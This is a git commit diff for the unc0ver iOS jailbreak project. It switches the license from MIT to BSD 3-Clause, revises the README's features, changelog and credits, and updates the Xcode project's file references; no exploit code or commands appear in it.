Update README.md

Update LICENSE
Update Injector
2019-07-12 22:49:59 +03:00 · 2019-06-28 23:12:58 +03:00 · 2019-06-12 16:29:42 +03:00 · 2019-06-12 12:07:49 +03:00 · 2019-06-12 11:50:53 +03:00 · 2019-06-10 16:02:46 +03:00
94 changed files with 8987 additions and 5449 deletions
@@ -1,21 +1,29 @@
-MIT License
+BSD 3-Clause License

-Copyright (c) 2018 Pwn20wnd
+Copyright (c) 2019, Pwn20wnd
+All rights reserved.

-Permission is hereby granted, free of charge, to any person obtaining a copy
-of this software and associated documentation files (the "Software"), to deal
-in the Software without restriction, including without limitation the rights
-to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
-copies of the Software, and to permit persons to whom the Software is
-furnished to do so, subject to the following conditions:
+Redistribution and use in source and binary forms, with or without
+modification, are permitted provided that the following conditions are met:

-The above copyright notice and this permission notice shall be included in all
-copies or substantial portions of the Software.
+1. Redistributions of source code must retain the above copyright notice, this
+   list of conditions and the following disclaimer.

-THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
-IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
-FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
-AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
-LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
-OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
-SOFTWARE.
+2. Redistributions in binary form must reproduce the above copyright notice,
+   this list of conditions and the following disclaimer in the documentation
+   and/or other materials provided with the distribution.
+
+3. Neither the name of the copyright holder nor the names of its
+   contributors may be used to endorse or promote products derived from
+   this software without specific prior written permission.
+
+THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
+AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
+DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
+FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
+SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
+CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
+OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
+OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
@@ -1,55 +1,42 @@
 # unc0ver
 ### The most advanced jailbreak tool
-![unc0ver logo](https://raw.githubusercontent.com/pwn20wndstuff/Undecimus/master/Undecimus/Assets.xcassets/AppIcon.appiconset/Icon-App-60x60%403x.png?token=AlyO4xDujoguob2DCFfUbNI8jO82OyCgks5bx5ZPwA%3D%3D)
+![unc0ver logo](https://github.com/pwn20wndstuff/Undecimus/raw/master/Undecimus/Assets.xcassets/AppIcon.appiconset/Icon-App-60x60%403x.png)

-unc0ver jailbreak for iOS 11.0 - 12.1.2<br/>
+unc0ver jailbreak for iOS 11.0 - 12.2<br/>
 by [@pwn20wnd](https://twitter.com/Pwn20wnd) & [@sbingner](https://twitter.com/sbingner)<br/>
-UI by [@DennisBednarz](https://twitter.com/DennisBednarz) & [Samg_is_a_Ninja](https://reddit.com/u/Samg_is_a_Ninja)<br/>
+UI by [@iOS_App_Dev](https://twitter.com/iOS_App_Dev) & [@HiMyNameIsUbik](https://twitter.com/HiMyNameIsUbik)<br/>

 ## The most outstanding changes over the other jailbreaks
-* All exploits in same app
-* Detailed error messages
-* Faster patches
-* More stable patches
-* No extra battery drain
-* No random freezes
-* No random slow downs
-* No data is logged or shared
-* No malware
-* Proper jailbreak state detection
-* Proper bootstrap extraction to fix issues such as Cydia not appearing after jailbreak
-* Native build of Cydia for iOS 11
-* Telesphoreo port for ARM64
-* Much faster Cydia
-* Much more stable Cydia
-* Much more modern looking and acting Cydia
-* Cydia skips uicache when not needed
-* Cydia supports iPhone X screen size
-* Cydia Substrate for tweak injection
-* Much faster ldrestart 
-* Much more stable ldrestart
-* Changes to Cydia were made with permission from Saurik 
-* Option to skip loading daemons
-* Option to dump APTicket
-* Option to refresh icon cache
-* Option to disable auto updates
-* Option to block app revokes
-* Option to restore RootFS
-* Button to restart device
-* Button to open Cydia in case it doesn't appear on the Home Screen
-* Label to show the days left till the application expires
-* Working debugserver
-* An awesome UI
+* One app to jailbreak all firmwares
+* Full-fledged Cydia and Substrate support for ARM64 devices
+* Full-fledged Telesphoreo port for ARM64 (Elucubratus)
+* No private data shared for diagnostics purposes
+* SSH-Only (Dropbear) support
+* Options for the user
+* Utilities for the user
+* No inefficient local jailbreak server (jailbreakd daemon)
+* Native Cydia support with support for the iPhone X screen size
+* Ability to rejailbreak from the jailbroken state
+* Stable kernelspace patches to avoid random crashes caused by kernel data aborts
+* Stable userspace patches to avoid random freezes and crashes caused by watchdog timer timeouts
+* Local APT repo system integrated in the jailbreak to verify the integrity of the core packages and repair them if they are corrupted
+* Extended and improved assertion to prevent unexpected results such as bootloops caused by filesystem corruption
+* Better system security, battery life and performance
+* Significantly faster Cydia
+* Modifications to Cydia were approved by the creator of Cydia (Saurik)
+* Fully working debugserver
+* No DRM
+* No installation restrictions
+* Open source

 ## Switching from the other jailbreaks
-* The RootFS will automatically be restored
+* Dedicated migration support will be used to switch without losing data

 ## Getting support
 * Use the built-in diagnostics tool
 * Tweet [@pwn20wnd](https://twitter.com/Pwn20wnd)

 ## Best practices
-* Perform a full restore with Rollectra before switching from the other jailbreaks
 * Turn on the AirPlane Mode before starting the jailbreak
 * Turn off Siri before starting the jailbreak

@@ -61,51 +48,24 @@ UI by [@DennisBednarz](https://twitter.com/DennisBednarz) & [Samg_is_a_Ninja](ht
 ## Video tutorial
 * <a href="https://youtu.be/TqHYjLHO0zs">https://youtu.be/TqHYjLHO0zs</a>

-## To Do List
-* Contact [@saurik](https://twitter.com/saurik) to enable the Cydia Store purchases on iOS 11 and remove the empty front page ads in Cydia: Partially done
-* Completely switch to Cydia Substrate and ditch Substitute: Done
-* Make switching from other jailbreaks without wiping the device possible: Done
-* Fix a kernel panic that's triggered by a kernel data abort which is caused by a UaF bug in jailbreakd: Done
-* Chain [@_bazad](https://twitter.com/_bazad)'s [blanket](https://github.com/bazad/blanket) to bypass the developer certificate requirement for multi_path: Almost done
-* Enable the on-fly entitlement patching on iOS 11: Work in progress
-* WebKit Port with [@_niklasb](https://twitter.com/_niklasb)'s [WebKit Exploit](https://github.com/phoenhex/files/tree/master/exploits/ios-11.3.1): Work in progress
-
 ## Screenshots
-<img src="https://raw.githubusercontent.com/pwn20wndstuff/Undecimus/master/Resources/Screenshot-1.PNG?token=AlyO4wXUInR6oHEgx0Tg31ri0t1q91frks5bx5ZbwA%3D%3D" width="281.25" height="609" /> <img src="https://raw.githubusercontent.com/pwn20wndstuff/Undecimus/master/Resources/Screenshot-2.PNG?token=AlyO48vs-YYcaKUgxXh8nIEUQQz_QEoqks5bx5ZqwA%3D%3D" width="281.25" height="609" /> <img src="https://raw.githubusercontent.com/pwn20wndstuff/Undecimus/master/Resources/Screenshot-3.PNG?token=AlyO44tYr5-jl7Pg0jup0tCqm3rSjUhiks5bx5Z4wA%3D%3D" width="281.25" height="609" />
+<img src="https://github.com/pwn20wndstuff/Undecimus/raw/master/Resources/Screenshot-1.PNG" width="281.25" height="609" /> <img src="https://github.com/pwn20wndstuff/Undecimus/raw/master/Resources/Screenshot-2.PNG" width="281.25" height="609" /> <img src="https://github.com/pwn20wndstuff/Undecimus/raw/master/Resources/Screenshot-3.PNG" width="281.25" height="609" />

 ## Changelog
-* ~~rc1: Initial release~~
-* ~~rc2: Add the dynastic repo by default and fix a bug in firmware checker~~
-* ~~rc3: Add a switch to manually enable restoring RootFS, stop erasing user preferences when restoring RootFS and fix bugs~~
-* ~~rc4: Add a label to display the uptime, a label to display the app's version number, spawn to the PATH and stop bundling system fonts~~
-* ~~rc5: Run videosubscriptionsd in the jailed state, fix a bug in firmware and update checker~~
-* ~~rc6: Start logging again, improve update checker and fix multi_path~~
-* ~~rc7: Fix a bug in RootFS Restore and multi_path~~
-* ~~rc8: Fix a bug in RootFS Remount and add a work in progress warning for some firmwares~~
-* ~~rc9: Fix a bug in RootFS Remount, add even more detailed error messages and add a switch to increase the memory limit to improve the stability and improve the compatibility layer to work correctly with some tweaks that were specifically made for the other jailbreaks~~
-* ~~v1.0.0: Fix a bug in RootFS Restore and Remount, make the settings tab match with the rest of the UI and fix bugs~~
-* ~~v1.0.1: Disable the RootFS Restore for the unstable versions~~
-* ~~v1.0.2: Enable and fix the RootFS Restore for all versions~~
-* ~~v1.0.3: Fix the beta firmwares~~
-* ~~v1.1.0: Automatically select the best exploit, rewrite the versions checker, improve assertion, show the code which has failed in the error messages, improve memory management, optimize and clean up the code, fix the Storage settings, switch to a new technique to disable auto updates, remove so much useless logging, only set the boot-nonce if the switch is on without checking if it exists or not, log offsets, remove static sleeps to improve the speed, fix series of bugs and leave no known bug~~
-* ~~v1.1.1: Add a label to show the ECID and a button to open the source code, improve auto layout and fix various bugs in RootFS remount, RootFS restore, RootFS resource copier, Icon cache refresher, Version checker, Exploit selector, jailbreak state detector and others~~
-* ~~v1.1.2: Improve auto layout and code and Significantly improve Empty_List (VFS) exploit and slightly improve Multi_Path (MPTCP)~~
-* ~~v1.1.3: Fix a bug in starting jailbreakd~~
-* ~~v1.1.4: Fix a bug in finding offsets:  [Download (IPA)](https://github.com/pwn20wndstuff/Undecimus/raw/master/Resources/Undecimus.ipa)~~
-* Releases are now available at https://github.com/pwn20wndstuff/Undecimus/releases
+* Releases are available at https://github.com/pwn20wndstuff/Undecimus/releases (Note: rc1-v1.1.4 releases are no longer available)

 ## Special Thanks
 * [@i41nbeer](https://twitter.com/i41nbeer) for mach_portal, triple_fetch, async_wake, empty_list, multi_path and deja_xnu
-* [@Morpheus______](https://twitter.com/Morpheus______) for the QiLin Toolkit
-* [@xerub](https://twitter.com/xerub) for libjb and the original patchfinder64
-* [@iBSparkes](https://twitter.com/iBSparkes) for the original amfid_payload, jailbreakd, pspawn_hook and machswap
+* [@bazad](https://twitter.com/bazad) for voucher_swap and PAC bypass
+* [@Morpheus______](https://twitter.com/Morpheus______) for the QiLin Toolkit (No longer used)
+* [@xerub](https://twitter.com/xerub) for the original patchfinder64
+* [@iBSparkes](https://twitter.com/iBSparkes) for the machswap and machswap2
 * [@stek29](https://twitter.com/stek29) for the patchfinder64 additions, unlocknvram, host_get_special_port(4) patch and shenanigans bypass
 * [@theninjaprawn](https://twitter.com/theninjaprawn) for the patchfinder64 additions
 * [@saurik](https://twitter.com/saurik) for Cydia and Substrate
 * [@FCE365](https://twitter.com/FCE365) for the empty_list reliability improvements
-* [@tihmstar](https://twitter.com/tihmstar) for libgrabkernel, liboffsetfinder64 and v1ntex
-* Credits for [Undecimus-Resources](https://github.com/pwn20wndstuff/Undecimus-Resources)
-* [@coolstarorg](https://twitter.com/coolstarorg) for originally testing the snapshot rename idea on corellium
+* [Samg_is_a_ninja](https://reddit.com/u/Samg_is_a_Ninja) for original UI development
+* [@DennisBednarz](https://twitter.com/DennisBednarz) for original UI design
 * [@Cryptiiiic](https://twitter.com/Cryptiiiic) for testing
 * [@xanDesign_](https://twitter.com/xanDesign_) for testing
 * [@AppleDry05](https://twitter.com/AppleDry05) for testing
@@ -8,7 +8,7 @@

 /* Begin PBXBuildFile section */
 		2101395521A09BB700F9C5F2 /* hideventsystem.c in Sources */ = {isa = PBXBuildFile; fileRef = 2101395321A09BB700F9C5F2 /* hideventsystem.c */; settings = {COMPILER_FLAGS = "-Wno-everything"; }; };
-		2116449A21737F9500250744 /* JailbreakViewController.m in Sources */ = {isa = PBXBuildFile; fileRef = 21C0FC6E21369EB700849420 /* JailbreakViewController.m */; settings = {COMPILER_FLAGS = "-Wno-unused-variable -Wno-unused-function -Wno-deprecated-declarations"; }; };
+		2116449A21737F9500250744 /* JailbreakViewController.m in Sources */ = {isa = PBXBuildFile; fileRef = 21C0FC6E21369EB700849420 /* JailbreakViewController.m */; };
 		212D8844216E4C4800A36DA5 /* find_port.c in Sources */ = {isa = PBXBuildFile; fileRef = 212D8842216E4C4700A36DA5 /* find_port.c */; };
 		212D8847216E4DF600A36DA5 /* early_kalloc.c in Sources */ = {isa = PBXBuildFile; fileRef = 212D8846216E4DF600A36DA5 /* early_kalloc.c */; };
 		212D884A216E4EBF00A36DA5 /* async_wake.c in Sources */ = {isa = PBXBuildFile; fileRef = 212D8849216E4EBE00A36DA5 /* async_wake.c */; };
@@ -24,6 +24,7 @@
 		2150A9E022021348001C8677 /* parameters.c in Sources */ = {isa = PBXBuildFile; fileRef = 2150A9D922021348001C8677 /* parameters.c */; };
 		2150A9E122021348001C8677 /* kernel_alloc.c in Sources */ = {isa = PBXBuildFile; fileRef = 2150A9DA22021348001C8677 /* kernel_alloc.c */; };
 		2150A9E222021348001C8677 /* kernel_memory.c in Sources */ = {isa = PBXBuildFile; fileRef = 2150A9DB22021348001C8677 /* kernel_memory.c */; };
+		2163BE2122A1DB4700518DD9 /* libsandbox.tbd in Frameworks */ = {isa = PBXBuildFile; fileRef = 2163BE2022A1DB4700518DD9 /* libsandbox.tbd */; };
 		216F3F3D2228776E007DC1BC /* kernel_call.c in Sources */ = {isa = PBXBuildFile; fileRef = 216F3F362228776D007DC1BC /* kernel_call.c */; };
 		216F3F3E2228776E007DC1BC /* user_client.c in Sources */ = {isa = PBXBuildFile; fileRef = 216F3F372228776D007DC1BC /* user_client.c */; };
 		216F3F3F2228776E007DC1BC /* pac.c in Sources */ = {isa = PBXBuildFile; fileRef = 216F3F3A2228776D007DC1BC /* pac.c */; };
@@ -32,9 +33,11 @@
 		2170BD3B21B193800059BD10 /* libMobileGestalt.tbd in Frameworks */ = {isa = PBXBuildFile; fileRef = 211D0D84218DEF3E008745D8 /* libMobileGestalt.tbd */; };
 		2170BDCD21B332FC0059BD10 /* SpringBoardServices.framework in Frameworks */ = {isa = PBXBuildFile; fileRef = 21C0FC902136A46500849420 /* SpringBoardServices.framework */; };
 		2171C4012222E3BB004E45C7 /* SystemConfiguration.framework in Frameworks */ = {isa = PBXBuildFile; fileRef = 2171C4002222E3BB004E45C7 /* SystemConfiguration.framework */; };
+		2199B8E9226B40C600A8255D /* kalloc_crash.c in Sources */ = {isa = PBXBuildFile; fileRef = 2199B8E8226B40C600A8255D /* kalloc_crash.c */; };
+		219C90A0228703DA00AFA38A /* jailbreak.m in Sources */ = {isa = PBXBuildFile; fileRef = 219C909F228703DA00AFA38A /* jailbreak.m */; settings = {COMPILER_FLAGS = "-Wno-unused-variable -Wno-unused-function -Wno-deprecated-declarations"; }; };
 		21A97FD02148103C00DC0023 /* remote_memory.c in Sources */ = {isa = PBXBuildFile; fileRef = 21A97FC62148103B00DC0023 /* remote_memory.c */; };
 		21A97FD12148103C00DC0023 /* KernelExecution.m in Sources */ = {isa = PBXBuildFile; fileRef = 21A97FC82148103B00DC0023 /* KernelExecution.m */; };
-		21A97FD32148103C00DC0023 /* KernelUtilities.c in Sources */ = {isa = PBXBuildFile; fileRef = 21A97FCC2148103B00DC0023 /* KernelUtilities.c */; };
+		21A97FD32148103C00DC0023 /* KernelUtilities.c in Sources */ = {isa = PBXBuildFile; fileRef = 21A97FCC2148103B00DC0023 /* KernelUtilities.c */; settings = {COMPILER_FLAGS = "-Wno-deprecated-declarations"; }; };
 		21A97FD42148103C00DC0023 /* remote_call.c in Sources */ = {isa = PBXBuildFile; fileRef = 21A97FCD2148103B00DC0023 /* remote_call.c */; };
 		21B421902261302F004C17CD /* MobileCoreServices.framework in Frameworks */ = {isa = PBXBuildFile; fileRef = 21B4218F2261302F004C17CD /* MobileCoreServices.framework */; };
 		21BB9804222F05C40012AF40 /* machswap2_pwn.m in Sources */ = {isa = PBXBuildFile; fileRef = 21BB9802222F05C40012AF40 /* machswap2_pwn.m */; settings = {COMPILER_FLAGS = "-Wno-unused-variable -Wno-unused-function"; }; };
@@ -43,13 +46,15 @@
 		21C0FC7721369EB800849420 /* LaunchScreen.storyboard in Resources */ = {isa = PBXBuildFile; fileRef = 21C0FC7521369EB800849420 /* LaunchScreen.storyboard */; };
 		21C0FC7A21369EB800849420 /* main.m in Sources */ = {isa = PBXBuildFile; fileRef = 21C0FC7921369EB800849420 /* main.m */; };
 		21C0FC8721369EE900849420 /* KernelMemory.c in Sources */ = {isa = PBXBuildFile; fileRef = 21C0FC8021369EE900849420 /* KernelMemory.c */; };
-		21C0FC8A21369EE900849420 /* KernelStructureOffsets.m in Sources */ = {isa = PBXBuildFile; fileRef = 21C0FC8621369EE900849420 /* KernelStructureOffsets.m */; };
+		21C0FC8A21369EE900849420 /* KernelOffsets.m in Sources */ = {isa = PBXBuildFile; fileRef = 21C0FC8621369EE900849420 /* KernelOffsets.m */; };
 		21C130E0214BC2880021AA9D /* unlocknvram.c in Sources */ = {isa = PBXBuildFile; fileRef = 21C130DE214BC2880021AA9D /* unlocknvram.c */; };
 		21C130EB214C03690021AA9D /* CreditsTableViewController.m in Sources */ = {isa = PBXBuildFile; fileRef = 21C130EA214C03690021AA9D /* CreditsTableViewController.m */; };
 		21C13119214D268F0021AA9D /* multi_path_sploit.c in Sources */ = {isa = PBXBuildFile; fileRef = 21C13117214D268F0021AA9D /* multi_path_sploit.c */; settings = {COMPILER_FLAGS = "-Wno-everything"; }; };
 		21C1312F214E69F80021AA9D /* empty_list_sploit.c in Sources */ = {isa = PBXBuildFile; fileRef = 21C0FC8521369EE900849420 /* empty_list_sploit.c */; settings = {COMPILER_FLAGS = "-Wno-everything"; }; };
+		21CC3905227CDFDE0072D572 /* prefs.m in Sources */ = {isa = PBXBuildFile; fileRef = 21CC3902227CDFDE0072D572 /* prefs.m */; };
+		21CC3906227CDFDE0072D572 /* diagnostics.m in Sources */ = {isa = PBXBuildFile; fileRef = 21CC3903227CDFDE0072D572 /* diagnostics.m */; };
 		21F4D70E21FC7A590070D5E0 /* patchfinder64.c in Sources */ = {isa = PBXBuildFile; fileRef = 21F4D70C21FC7A590070D5E0 /* patchfinder64.c */; settings = {COMPILER_FLAGS = "-Wno-unused-variable -Wno-unused-function"; }; };
-		21FED6AB2168F8060024BC95 /* SettingsTableViewController.m in Sources */ = {isa = PBXBuildFile; fileRef = 21C130E5214BDDE20021AA9D /* SettingsTableViewController.m */; settings = {COMPILER_FLAGS = "-Wno-unused-variable -Wno-unused-function"; }; };
+		21FED6AB2168F8060024BC95 /* SettingsTableViewController.m in Sources */ = {isa = PBXBuildFile; fileRef = 21C130E5214BDDE20021AA9D /* SettingsTableViewController.m */; };
 		21FF63CB224E5FDC008B76D9 /* offsetcache.c in Sources */ = {isa = PBXBuildFile; fileRef = 21FF63C9224E5FDC008B76D9 /* offsetcache.c */; };
 		21FFE0F8222E4C0600EC59B2 /* machswap_offsets.m in Sources */ = {isa = PBXBuildFile; fileRef = 21FFE0F6222E4C0600EC59B2 /* machswap_offsets.m */; settings = {COMPILER_FLAGS = "-Wno-unused-variable -Wno-unused-function"; }; };
 		21FFE0F9222E4C0600EC59B2 /* machswap_pwn.m in Sources */ = {isa = PBXBuildFile; fileRef = 21FFE0F7222E4C0600EC59B2 /* machswap_pwn.m */; settings = {COMPILER_FLAGS = "-Wno-unused-variable -Wno-unused-function"; }; };
@@ -60,6 +65,9 @@
 		22CFED9221CDFE6B00A216BE /* libmis.tbd in Frameworks */ = {isa = PBXBuildFile; fileRef = 22CFED9121CDFE6B00A216BE /* libmis.tbd */; };
 		22F91CDB21E02CF300B2FCAE /* inject.m in Sources */ = {isa = PBXBuildFile; fileRef = 22F91CD921E02CF200B2FCAE /* inject.m */; };
 		22F91CE321E033A500B2FCAE /* libsnappy.c in Sources */ = {isa = PBXBuildFile; fileRef = 22F91CE221E033A500B2FCAE /* libsnappy.c */; };
+		51435081229E2F0C00446FBA /* Settings-Light.png in Resources */ = {isa = PBXBuildFile; fileRef = 51435080229E2F0C00446FBA /* Settings-Light.png */; };
+		51F1DB24229ED54400B81A6F /* DarkMode-Dark.png in Resources */ = {isa = PBXBuildFile; fileRef = 51F1DB22229ED54300B81A6F /* DarkMode-Dark.png */; };
+		51F1DB25229ED54400B81A6F /* Settings-Dark.png in Resources */ = {isa = PBXBuildFile; fileRef = 51F1DB23229ED54400B81A6F /* Settings-Dark.png */; };
 		8D592A68218E47F60035D2BC /* Main.storyboard in Resources */ = {isa = PBXBuildFile; fileRef = 8D592A67218E47F60035D2BC /* Main.storyboard */; };
 /* End PBXBuildFile section */

@@ -105,6 +113,8 @@
 		2150A9E322021381001C8677 /* mach_vm.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = mach_vm.h; sourceTree = "<group>"; };
 		2150A9E422021381001C8677 /* ipc_port.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = ipc_port.h; sourceTree = "<group>"; };
 		2150A9E52202138A001C8677 /* IOKitLib.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = IOKitLib.h; sourceTree = "<group>"; };
+		2163BE1F22A1DB2400518DD9 /* sandbox.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = sandbox.h; sourceTree = "<group>"; };
+		2163BE2022A1DB4700518DD9 /* libsandbox.tbd */ = {isa = PBXFileReference; lastKnownFileType = "sourcecode.text-based-dylib-definition"; name = libsandbox.tbd; path = usr/lib/libsandbox.tbd; sourceTree = SDKROOT; };
 		216F3F352228776D007DC1BC /* user_client.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = user_client.h; sourceTree = "<group>"; };
 		216F3F362228776D007DC1BC /* kernel_call.c */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.c; path = kernel_call.c; sourceTree = "<group>"; };
 		216F3F372228776D007DC1BC /* user_client.c */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.c; path = user_client.c; sourceTree = "<group>"; };
@@ -115,6 +125,11 @@
 		216F3F3C2228776E007DC1BC /* kc_parameters.c */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.c; path = kc_parameters.c; sourceTree = "<group>"; };
 		216FDA1D220C5F5C0086D802 /* libz.tbd */ = {isa = PBXFileReference; lastKnownFileType = "sourcecode.text-based-dylib-definition"; name = libz.tbd; path = usr/lib/libz.tbd; sourceTree = SDKROOT; };
 		2171C4002222E3BB004E45C7 /* SystemConfiguration.framework */ = {isa = PBXFileReference; lastKnownFileType = wrapper.framework; name = SystemConfiguration.framework; path = System/Library/Frameworks/SystemConfiguration.framework; sourceTree = SDKROOT; };
+		2199B8E7226B40C600A8255D /* kalloc_crash.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = kalloc_crash.h; sourceTree = "<group>"; };
+		2199B8E8226B40C600A8255D /* kalloc_crash.c */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.c; path = kalloc_crash.c; sourceTree = "<group>"; };
+		219BF90422832DBC00A4B827 /* UIProgressHUD.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = UIProgressHUD.h; sourceTree = "<group>"; };
+		219C909E228703DA00AFA38A /* jailbreak.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = jailbreak.h; sourceTree = "<group>"; };
+		219C909F228703DA00AFA38A /* jailbreak.m */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.objc; path = jailbreak.m; sourceTree = "<group>"; };
 		21A97FC42148103A00DC0023 /* KernelExecution.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = KernelExecution.h; sourceTree = "<group>"; };
 		21A97FC52148103B00DC0023 /* remote_call.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = remote_call.h; sourceTree = "<group>"; };
 		21A97FC62148103B00DC0023 /* remote_memory.c */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.c; path = remote_memory.c; sourceTree = "<group>"; };
@@ -137,10 +152,10 @@
 		21C0FC7921369EB800849420 /* main.m */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.objc; path = main.m; sourceTree = "<group>"; };
 		21C0FC8021369EE900849420 /* KernelMemory.c */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.c; path = KernelMemory.c; sourceTree = "<group>"; };
 		21C0FC8121369EE900849420 /* empty_list_sploit.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = empty_list_sploit.h; sourceTree = "<group>"; };
-		21C0FC8221369EE900849420 /* KernelStructureOffsets.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = KernelStructureOffsets.h; sourceTree = "<group>"; };
+		21C0FC8221369EE900849420 /* KernelOffsets.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = KernelOffsets.h; sourceTree = "<group>"; };
 		21C0FC8321369EE900849420 /* KernelMemory.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = KernelMemory.h; sourceTree = "<group>"; };
 		21C0FC8521369EE900849420 /* empty_list_sploit.c */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.c; path = empty_list_sploit.c; sourceTree = "<group>"; };
-		21C0FC8621369EE900849420 /* KernelStructureOffsets.m */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.objc; path = KernelStructureOffsets.m; sourceTree = "<group>"; };
+		21C0FC8621369EE900849420 /* KernelOffsets.m */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.objc; path = KernelOffsets.m; sourceTree = "<group>"; };
 		21C0FC8B21369FC500849420 /* common.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = common.h; sourceTree = "<group>"; };
 		21C0FC8F2136A2C500849420 /* iokit.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = iokit.h; sourceTree = "<group>"; };
 		21C0FC902136A46500849420 /* SpringBoardServices.framework */ = {isa = PBXFileReference; lastKnownFileType = wrapper.framework; path = SpringBoardServices.framework; sourceTree = "<group>"; };
@@ -152,7 +167,10 @@
 		21C130EA214C03690021AA9D /* CreditsTableViewController.m */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.objc; path = CreditsTableViewController.m; sourceTree = "<group>"; };
 		21C13117214D268F0021AA9D /* multi_path_sploit.c */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.c; path = multi_path_sploit.c; sourceTree = "<group>"; };
 		21C13118214D268F0021AA9D /* multi_path_sploit.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = multi_path_sploit.h; sourceTree = "<group>"; };
-		21C1312E214D5A710021AA9D /* multi_path.entitlements */ = {isa = PBXFileReference; lastKnownFileType = text.plist.entitlements; path = multi_path.entitlements; sourceTree = "<group>"; };
+		21CC3901227CDFDE0072D572 /* prefs.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = prefs.h; sourceTree = "<group>"; };
+		21CC3902227CDFDE0072D572 /* prefs.m */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.objc; path = prefs.m; sourceTree = "<group>"; };
+		21CC3903227CDFDE0072D572 /* diagnostics.m */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.objc; path = diagnostics.m; sourceTree = "<group>"; };
+		21CC3904227CDFDE0072D572 /* diagnostics.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = diagnostics.h; sourceTree = "<group>"; };
 		21E9642421A1DD6F000625F7 /* NSTask.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = NSTask.h; sourceTree = "<group>"; };
 		21F4D70C21FC7A590070D5E0 /* patchfinder64.c */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.c; name = patchfinder64.c; path = patchfinder64/patchfinder64.c; sourceTree = SOURCE_ROOT; };
 		21F4D70D21FC7A590070D5E0 /* patchfinder64.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; name = patchfinder64.h; path = patchfinder64/patchfinder64.h; sourceTree = SOURCE_ROOT; };
@@ -177,6 +195,14 @@
 		22F91CDA21E02CF300B2FCAE /* inject.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; name = inject.h; path = Injector/inject.h; sourceTree = SOURCE_ROOT; };
 		22F91CDE21E02EB000B2FCAE /* snappy.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; name = snappy.h; path = snappy/snappy.h; sourceTree = SOURCE_ROOT; };
